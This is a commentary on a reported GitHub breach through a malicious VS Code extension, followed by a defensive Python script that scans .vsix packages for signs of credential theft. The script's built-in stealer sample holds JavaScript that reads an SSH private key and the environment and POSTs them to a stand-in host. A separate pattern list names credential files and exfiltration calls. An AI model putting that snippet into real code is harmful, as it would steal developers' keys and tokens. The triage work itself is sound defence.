Software supply chain attacks exploit trust in legitimate platforms and the extensions built on them. By distributing malicious code through a trusted channel such as an editor's extension marketplace, an attacker can compromise thousands of repositories at once. The incident below shows that even well-established platforms and widely used extensions are exposed when users install software without verifying it first.
GitHub confirms breach of 3,800 repos via malicious VSCode extension
Oh, look, another day, another breach.
GitHub just confirmed that nearly 4,000 repositories got compromised through a malicious VS Code extension.
You know, that little text editor you trusted because everyone on Twitter said it was fine.
Here's the beautiful irony.
Developers spend all day lecturing us about security best practices while casually installing random extensions from the marketplace like they're browsing a sketchy app store in 2009.
And apparently, one of those extensions decided to help itself to some valuable source code and credentials.
The extension, naturally, looked legitimate enough to fool thousands of people.
It probably had a nice description, some stars, maybe even a couple of fake reviews.
The attacker basically walked in through the front door while everyone was too busy optimizing their Vim configuration to notice.
What makes this particularly delicious is that this is the open source community we're talking about.
The people who invented supply chain security in response to previous disasters.
And yet here we are again, watching the exact same movie with slightly different actors.
GitHub has since removed the extension and they're doing the whole responsible disclosure dance, but the damage is already done.
Your private keys, your API tokens, your unpublished code, it's all probably sitting in some attacker's database right now, and there's not much you can do about it except change literally everything.
The lesson here, if you even need one, is that trust is a currency we spend too freely in tech.
We see a few downloads and some decent marketing, and suddenly we're running arbitrary code on our machines without a second thought.
Link in bio for the full overfitted breakdown.
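The commentary's point is that an extension is arbitrary code run with the developer's own privileges, and that nobody looked before installing. As an added example (not code from the video, from GitHub, or from any real extension), the following Python script does the minimum pre-install check a practitioner would want: it unpacks a .vsix (a zip archive whose manifest sits at extension/package.json), reports the publisher and activation events, and flags bundled JavaScript that both touches credential files and has a path to the network. The indicator list, the risk scoring and the two sample packages built in memory are constructed for illustration and are not drawn from the incident.

```python
"""Pre-install triage of a VS Code extension package (.vsix).

A .vsix is a zip archive; the manifest is extension/package.json and its
"main" field names the JavaScript entry point. This script reads the
manifest, reports who published it and when it activates, and greps every
bundled .js file for strings a credential stealer needs. Heuristic only.
"""
import io
import json
import re
import zipfile

# Assumed indicator list; tune it for your environment. Each regex is a
# string a stealer would plausibly contain, not proof of malice on its own.
SUSPICIOUS_PATTERNS = {
    "ssh_keys":        re.compile(r"\.ssh\b|id_rsa|id_ed25519"),
    "git_credentials": re.compile(r"\.git-credentials|\.gitconfig|\.netrc"),
    "cloud_tokens":    re.compile(r"\.aws\b|GITHUB_TOKEN|NPM_TOKEN|\.npmrc\b"),
    "env_dump":        re.compile(r"process\.env\b"),
    "exfil_http":      re.compile(r"https?://|\bfetch\(|\bhttps?\.request\(|XMLHttpRequest"),
    "obfuscation":     re.compile(r"\beval\(|\bFunction\(|fromCharCode|\batob\("),
}
CREDENTIAL_KEYS = {"ssh_keys", "git_credentials", "cloud_tokens", "env_dump"}


def risk_level(activates_on_startup: bool, findings: dict) -> str:
    """'high' = reads secrets and has a network path; 'review' = anything odd."""
    hits = {h for hs in findings.values() for h in hs}
    if hits & CREDENTIAL_KEYS and "exfil_http" in hits:
        return "high"
    if hits or activates_on_startup:
        return "review"
    return "low"


def triage_vsix(vsix_bytes: bytes) -> dict:
    """Return a triage report for one .vsix given as bytes."""
    with zipfile.ZipFile(io.BytesIO(vsix_bytes)) as zf:
        manifest = json.loads(zf.read("extension/package.json"))
        # Scan every .js in the package, not just "main": the payload can
        # hide in a module that the entry point merely require()s.
        js_sources = {
            name: zf.read(name).decode("utf-8", errors="replace")
            for name in zf.namelist()
            if name.startswith("extension/") and name.endswith(".js")
        }
    findings = {}
    for name, src in js_sources.items():
        hits = [key for key, rx in SUSPICIOUS_PATTERNS.items() if rx.search(src)]
        if hits:
            findings[name] = hits
    activation = manifest.get("activationEvents", [])
    # "*" and onStartupFinished run the extension as soon as the editor opens,
    # with no user action; a colour theme has no legitimate need for that.
    on_startup = "*" in activation or "onStartupFinished" in activation
    return {
        "publisher": manifest.get("publisher", "<missing>"),
        "name": manifest.get("name"),
        "version": manifest.get("version"),
        "main": manifest.get("main"),
        "activates_on_startup": on_startup,
        "findings": findings,
        "risk": risk_level(on_startup, findings),
    }


def build_vsix(manifest: dict, files: dict) -> bytes:
    """Build a minimal in-memory .vsix (used only for the constructed samples)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("extension/package.json", json.dumps(manifest))
        for path, content in files.items():
            zf.writestr("extension/" + path, content)
    return buf.getvalue()


# Constructed samples, not real marketplace extensions.
BENIGN_VSIX = build_vsix(
    {"name": "hello-lint", "publisher": "example-dev", "version": "1.0.0",
     "main": "./out/extension.js", "activationEvents": ["onLanguage:python"]},
    {"out/extension.js": "exports.activate = (ctx) => { console.log('hello-lint ready'); };"},
)
STEALER_VSIX = build_vsix(
    {"name": "pretty-theme", "publisher": "themes4u", "version": "0.0.3",
     "main": "./out/extension.js", "activationEvents": ["*"]},
    {"out/extension.js": "require('./helper'); exports.activate = () => {};",
     "out/helper.js": (
         "const fs=require('fs'),os=require('os'),p=require('path');"
         "const key=fs.readFileSync(p.join(os.homedir(),'.ssh','id_rsa'),'utf8');"
         "fetch('https://example.invalid/c',{method:'POST',"
         "body:JSON.stringify({key,env:process.env})});"
     )},
)

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else STEALER_VSIX
    print(json.dumps(triage_vsix(data), indent=2))
```

Run it with the path of a downloaded .vsix as the first argument; with no argument it triages the constructed stealer sample, which comes back "high" because the helper module reads an SSH key and the environment and then POSTs them out. A "low" report is not proof of safety (obfuscated or dynamically fetched payloads defeat string matching), but a "high" verdict on something you were about to install is exactly the look-before-you-run step the commentary says nobody takes.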